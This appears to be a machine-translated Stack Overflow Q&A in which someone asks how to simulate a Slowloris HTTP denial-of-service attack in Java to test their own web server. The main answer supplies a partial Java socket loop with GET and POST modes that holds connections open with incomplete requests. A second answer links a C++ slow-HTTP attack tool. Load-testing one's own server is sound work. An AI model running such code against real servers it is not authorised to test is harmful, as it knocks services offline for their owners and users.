-1

我需要编写 java 代码测试来模拟我的 Web 服务器上的 Slowloris HTTP DoS 攻击。我找到了一个执行此操作的 perl 代码:http: //ha.ckers.org/slowloris/

我的环境不是固定的,这意味着我不能保证在机器上安装了 active-perl。还有另一种方法吗?有没有办法使用 jerl ( https://code.google.com/p/jerl/ ) 来做到这一点而无需安装 active-perl (也许我可以将所需的库添加到我的 java 项目中?)?

4

2 回答 2

1
switch (dosMethod) {
        case GET:
            while(!StopWorking)
            {
                for(int i=0;i<per_Thread;i++)
                {
                    if(socks[i].isConnected())
                    {
                    try
                    {
                        PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                        pw.println("GET / HTTP/1.1");
                        pw.println("Host: " + hp.getHostText());
                        pw.println();
                        pw.flush();
                    }
                    catch (Exception e){}
                    }
                    else
                    {
                        try {
                            socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                }
            }
            break;
        case POST:
            for(int i=0;i<per_Thread;i++)
            {
                try {
                    socks[i].close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            while(!StopWorking)
            {
                for(int i=0;i<per_Thread;i++)
                {
                    if(socks[i].isConnected())
                    {
                        try {
                            PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                            pw.println();
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                    else
                    {
                        try {
                            socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
                            PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                            pw.println("POST / HTTP/1.1");
                            pw.println("User-Agent: %s");
                            pw.println("Connection: keep-alive");
                            pw.println("Keep-Alive: 900");
                            pw.println("Content-Length: 10000");
                            pw.println("Content-Type: application/x-www-form-urlencoded");
                            pw.println();
                            pw.flush();
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                }
            }
            break;
    }

其中 socks 是一个套接字数组 (Socket[] socks = new Socket[connsperthread];

于 2013-07-09T21:03:58.903 回答
0

您可以使用用 C++ 编写的这个实现https://community.quallys.com/blogs/securitylabs/2011/08/25/new-open-source-tool-for-slow-http-attack-vulnerabilities

于 2013-04-25T14:25:25.427 回答